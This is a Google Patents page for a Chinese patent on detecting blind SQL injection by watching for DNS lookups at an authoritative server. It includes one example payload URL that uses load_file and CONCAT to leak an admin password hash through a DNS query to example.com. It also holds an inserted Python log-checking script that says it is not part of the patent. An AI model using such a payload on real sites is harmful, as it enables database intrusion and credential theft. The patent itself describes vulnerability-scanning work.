CN109347805A - DNS-based echoless SQL injection detection method - Google Patents
- Publication number: CN109347805A
- Authority: CN (China)
- Prior art keywords: dns server, dns, sql injection, request, authoritative
- Legal status: Granted
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The present invention relates to a DNS-based echoless SQL injection detection method. An SQL injection scanner sends an HTTP request carrying a detection payload to the target website; when the payload is executed, a DNS request directed at an authoritative DNS server is initiated. The authoritative DNS server resolves the request, returns a response to the target website, and records the resolution result in a log. When the SQL injection scanner sends a resolution-record query request to the authoritative DNS server via an HTTP request, the log is queried, and whether the website has an SQL injection vulnerability is determined by whether a resolution record exists. The invention uses DNS resolution records in a specific encoding format to detect echoless SQL injection, so that vulnerabilities can be detected quickly and accurately, detection time is reduced, scanner detection efficiency is improved, and false negatives and false positives are prevented.
Description
Technical field
The present invention relates to the technical field of security arrangements for protecting computers, their components, programs or data against unauthorized activity, and in particular to a DNS-based echoless SQL injection detection method that detects echoless SQL injection quickly and effectively and reduces the scanner's false positive rate and false negative rate for SQL injection vulnerabilities.
Background art
SQL is a standard computer language for accessing and operating database systems; SQL statements are used to retrieve and update data in a database. SQL works together with database programs and is widely used in Microsoft Access, DB2, Informix, Microsoft SQL Server, Oracle, Sybase and other database systems.
However, because developers use SQL statements improperly, SQL injection vulnerabilities are widespread. An SQL injection vulnerability is a security vulnerability that occurs at the database layer of an application. In brief, SQL instructions are injected into an input string; a poorly designed program neglects to check the input, so the injected instructions are mistaken by the database server for normal SQL instructions and executed, and the system is consequently damaged or compromised.
In the prior art, SQL injection detection is one of the conventional detection methods. Classified by the type of detection payload, SQL injection vulnerability detection includes boolean-based blind injection, time-based blind injection, error-based SQL injection, union-based SQL injection and other types. Boolean-based blind injection, error-based SQL injection and union-based SQL injection are commonly used to detect SQL injection vulnerabilities that produce an echo, while time-based blind injection is commonly used to detect echoless SQL injection vulnerabilities.
Detection methods such as boolean-based blind injection, error-based SQL injection and union-based SQL injection send different detection payloads during detection, which produce different HTTP response packets; page analysis is performed on these different responses to judge whether a vulnerability exists. For an echoless SQL injection vulnerability, however, requests carrying different payloads receive identical responses, so page analysis concludes that no SQL vulnerability exists, and the SQL vulnerability is missed (a false negative).
The time-based blind injection detection method sends different detection payload requests during detection, which cause the target website to respond with a delay; the length of the delay is determined by the detection payload request, and whether an SQL vulnerability exists is judged from the differing response times. Time-based blind injection can therefore be used to detect echoless SQL vulnerabilities. In practice, however, uncontrollable factors such as network quality introduce unnecessary delay while the HTTP packets are in transit, so detecting echoless SQL injection vulnerabilities with time-based blind injection readily produces a large number of false positives.
Summary of the invention
To solve the problems in the prior art, the present invention provides an optimized DNS-based echoless SQL injection detection method.
The technical solution adopted by the invention is a DNS-based echoless SQL injection detection method comprising the following steps:
Step 1: The SQL injection scanner sends an HTTP request carrying a detection payload to the target website;
Step 2: The detection payload passes through the target website into the database server; the detection code in the payload is executed by the database and initiates a DNS request directed at the authoritative DNS server;
Step 3: The authoritative DNS server resolves the DNS request, returns a response to the target website, and records the resolution result in a log;
Step 4: Determine whether the SQL injection scanner has sent, via an HTTP request, a resolution-result query request to the authoritative DNS server; if so, proceed to the next step; otherwise, return to step 1;
Step 5: The authoritative DNS server responds to the query request of the SQL injection scanner and queries the log; if a resolution record exists, the website has an SQL injection vulnerability; otherwise, no SQL injection vulnerability exists; the SQL injection detection result is returned.
Preferably, in step 2, the DNS request contains the special string that the SQL injection scanner uses for detecting SQL vulnerabilities.
Preferably, in step 3, the resolution by the authoritative DNS server of the DNS request directed at it comprises the following steps:
Step 3.1: The DNS request reaches the default DNS server;
Step 3.2: The default DNS server cannot resolve it and sends a query request to the parent DNS server of the default DNS server;
Step 3.3: The parent DNS server resolves the DNS request to obtain the address of the authoritative DNS server;
Step 3.4: The parent DNS server returns the authoritative DNS server address to the default DNS server;
Step 3.5: The default DNS server uses the authoritative DNS server address to send the DNS query request again, this time to the authoritative DNS server;
Step 3.6: The authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing the resolution of the DNS request.
The present invention provides an optimized DNS-based echoless SQL injection detection method. The SQL injection scanner sends an HTTP request carrying a detection payload to the target website; when the payload is executed, a DNS request directed at the authoritative DNS server is initiated. The authoritative DNS server resolves the request, returns a response to the target website, and records the resolution result in a log. When the SQL injection scanner sends a resolution-record query request to the authoritative DNS server via an HTTP request, the log is queried, and whether the website has an SQL injection vulnerability is determined by whether a resolution record exists. The invention uses DNS resolution records in a specific encoding format to detect echoless SQL injection. In echoless SQL injection detection, this solves the false negative problem of boolean-based blind injection, error-based SQL injection and union-based SQL injection, and the false positive problem of time-based blind injection. Vulnerabilities can be detected quickly and accurately, detection time is reduced, scanner detection efficiency is improved, and false negatives and false positives are prevented.
Brief description of the drawings
Fig. 1 is a flow chart of the invention.
Specific embodiment
The present invention is described in further detail below with reference to an embodiment, but the scope of protection of the invention is not limited thereto.
The present invention relates to a DNS-based echoless SQL injection detection method. DNS is an Internet service that acts as a distributed database mapping domain names and IP addresses to each other, making the Internet easier to access; DNS resolution, the conversion between a domain name and its IP address, is carried out by DNS servers.
Taking as an example a target website that has an SQL injection vulnerability, with the domain name example.com resolved by the authoritative DNS and used for detection, the method comprises the following steps.
Step 1: The SQL injection scanner sends an HTTP request carrying a detection payload to the target website.
In the present invention, an example of the HTTP request is:
http://example.com/sqli.php?id=1 union select 1,2,load_file(CONCAT('dns_sqli_',(SELECT hex(pass) FROM test.test_user WHERE name='admin' LIMIT 1),'.example.com\abc'))
Step 2: The detection payload passes through the target website into the database server; the detection code in the payload is executed by the database and initiates a DNS request directed at the authoritative DNS server.
In step 2, the DNS request contains the special string that the SQL injection scanner uses for detecting SQL vulnerabilities.
In the present invention, an example of a DNS request directed at the authoritative DNS server is dns_sqli_password.example.com; an example of the special string is dns_sqli_password.
Step 3: The authoritative DNS server resolves the DNS request, returns a response to the target website, and records the resolution result in a log.
In step 3, the resolution by the authoritative DNS server of the DNS request directed at it comprises the following steps:
Step 3.1: The DNS request reaches the default DNS server;
Step 3.2: The default DNS server cannot resolve it and sends a query request to the parent DNS server of the default DNS server;
Step 3.3: The parent DNS server resolves the DNS request to obtain the address of the authoritative DNS server;
Step 3.4: The parent DNS server returns the authoritative DNS server address to the default DNS server;
Step 3.5: The default DNS server uses the authoritative DNS server address to send the DNS query request again, this time to the authoritative DNS server;
Step 3.6: The authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing the resolution of the DNS request.
In the present invention, let the DNS request be test.example.com. Because the parent DNS server is not the resolution server for example.com, it cannot resolve test.example.com, but it can determine that test.example.com is a subdomain of example.com, and it can resolve the address of the authoritative DNS server for example.com. The parent DNS server therefore returns the authoritative DNS server address to the default DNS server; the default DNS server re-initiates the DNS query request for test.example.com, this time to the authoritative DNS server; and the authoritative DNS server resolves the DNS request and returns the correct IP address of test.example.com to the default DNS server.
Step 4: Determine whether the SQL injection scanner has sent, via an HTTP request, a resolution-result query request to the authoritative DNS server; if so, proceed to the next step; otherwise, return to step 1.
In the present invention, an example of the query request is: query whether a request containing the string "dns_sqli_" exists on the authoritative DNS server.
Step 5: The authoritative DNS server responds to the query request of the SQL injection scanner and queries the log; if a resolution record exists, the website has an SQL injection vulnerability; otherwise, no SQL injection vulnerability exists; the SQL injection detection result is returned.
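The log check of steps 4 and 5, as an added example that is not part of the patent text: the log line format, the client addresses, the timestamps and the token dns_sqli_a1b2c3 are constructed for illustration. It goes slightly beyond the page by ignoring records older than the probe and names that only contain the marker outside the example.com zone, two cases that would otherwise produce a false positive.

```python
import re
from datetime import datetime, timezone

ZONE = "example.com"   # zone the authoritative DNS server answers for (from the page)
MARKER = "dns_sqli_"   # special string the page's scanner looks for

# Hypothetical log format and constructed sample records, for illustration only.
SAMPLE_LOG = """\
2018-09-19T08:00:01Z client=203.0.113.7 qname=www.example.com. qtype=A
2018-09-19T08:59:40Z client=203.0.113.7 qname=dns_sqli_old.example.com. qtype=A
2018-09-19T09:00:03Z client=198.51.100.53 qname=DNS_SQLI_a1b2c3.Example.COM. qtype=A
2018-09-19T09:00:04Z client=198.51.100.53 qname=dns_sqli_x.example.com.other.test. qtype=A
malformed line without fields
"""
PROBE_SENT_AT = datetime(2018, 9, 19, 9, 0, 0, tzinfo=timezone.utc)  # constructed

LINE_RE = re.compile(
    r"^(?P<ts>\S+) client=(?P<client>\S+) qname=(?P<qname>\S+) qtype=(?P<qtype>\S+)$"
)


def parse_line(line):
    """Return (timestamp, client, normalized qname), or None for an unparsable line."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    try:
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    except ValueError:
        return None
    # DNS names are case-insensitive and may carry a trailing root dot.
    return ts, m["client"], m["qname"].rstrip(".").lower()


def marker_hits(log_text, since, zone=ZONE, marker=MARKER):
    """Records at or after `since` whose leftmost label starts with the marker."""
    suffix = "." + zone.lower()
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, client, qname = rec
        if ts < since:
            continue  # stale record left over from an earlier scan
        if not qname.endswith(suffix):
            continue  # marker appears, but the name is not inside our zone
        leftmost = qname[: -len(suffix)].split(".")[0]
        if leftmost.startswith(marker):
            hits.append((ts, client, qname))
    return hits


def verdict(log_text, probe_sent_at):
    """Step 5: a matching resolution record means the injected code executed."""
    if marker_hits(log_text, probe_sent_at):
        return "vulnerable"
    return "no vulnerability detected"


if __name__ == "__main__":
    for ts, client, qname in marker_hits(SAMPLE_LOG, PROBE_SENT_AT):
        print(ts.isoformat(), client, qname)
    print(verdict(SAMPLE_LOG, PROBE_SENT_AT))
```

The client address in a hit is the resolver that contacted the authoritative server, not necessarily the database host itself, as the resolution chain in steps 3.1 to 3.6 shows.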
In the present invention, the SQL injection scanner sends an HTTP request carrying a detection payload to the target website; when the payload is executed, a DNS request directed at the authoritative DNS server is initiated. The authoritative DNS server resolves the request, returns a response to the target website, and records the resolution result in a log. When the SQL injection scanner sends a resolution-record query request to the authoritative DNS server via an HTTP request, the log is queried, and whether the website has an SQL injection vulnerability is determined by whether a resolution record exists. The invention uses DNS resolution records in a specific encoding format to detect echoless SQL injection. In echoless SQL injection detection, this solves the false negative problem of boolean-based blind injection, error-based SQL injection and union-based SQL injection, and the false positive problem of time-based blind injection. Vulnerabilities can be detected quickly and accurately, detection time is reduced, scanner detection efficiency is improved, and false negatives and false positives are prevented.
Claims (3)
1. A DNS-based echoless SQL injection detection method, characterized in that the method comprises the following steps:
Step 1: The SQL injection scanner sends an HTTP request carrying a detection payload to the target website;
Step 2: The detection payload passes through the target website into the database server; the detection code in the payload is executed by the database and initiates a DNS request directed at the authoritative DNS server;
Step 3: The authoritative DNS server resolves the DNS request, returns a response to the target website, and records the resolution result in a log;
Step 4: Determine whether the SQL injection scanner has sent, via an HTTP request, a resolution-result query request to the authoritative DNS server; if so, proceed to the next step; otherwise, return to step 1;
Step 5: The authoritative DNS server responds to the query request of the SQL injection scanner and queries the log; if a resolution record exists, the website has an SQL injection vulnerability; otherwise, no SQL injection vulnerability exists; the SQL injection detection result is returned.
2. The DNS-based echoless SQL injection detection method according to claim 1, characterized in that: in step 2, the DNS request contains the special string that the SQL injection scanner uses for detecting SQL vulnerabilities.
3. The DNS-based echoless SQL injection detection method according to claim 1, characterized in that: in step 3, the resolution by the authoritative DNS server of the DNS request directed at it comprises the following steps:
Step 3.1: The DNS request reaches the default DNS server;
Step 3.2: The default DNS server cannot resolve it and sends a query request to the parent DNS server of the default DNS server;
Step 3.3: The parent DNS server resolves the DNS request to obtain the address of the authoritative DNS server;
Step 3.4: The parent DNS server returns the authoritative DNS server address to the default DNS server;
Step 3.5: The default DNS server uses the authoritative DNS server address to send the DNS query request again, this time to the authoritative DNS server;
Step 3.6: The authoritative DNS server resolves the DNS request and returns the correct IP address to the default DNS server, completing the resolution of the DNS request.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN201811096610.0A CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Publications (2)
Publication Number | Publication Date |
---|---|
CN109347805A true CN109347805A (en) | 2019-02-15 |
CN109347805B CN109347805B (en) | 2021-06-15 |
Family
ID=65305552
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN201811096610.0A Active CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN109347805B (en) |
Also Published As
Publication number | Publication date |
---|---|
CN109347805B (en) | 2021-06-15 |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||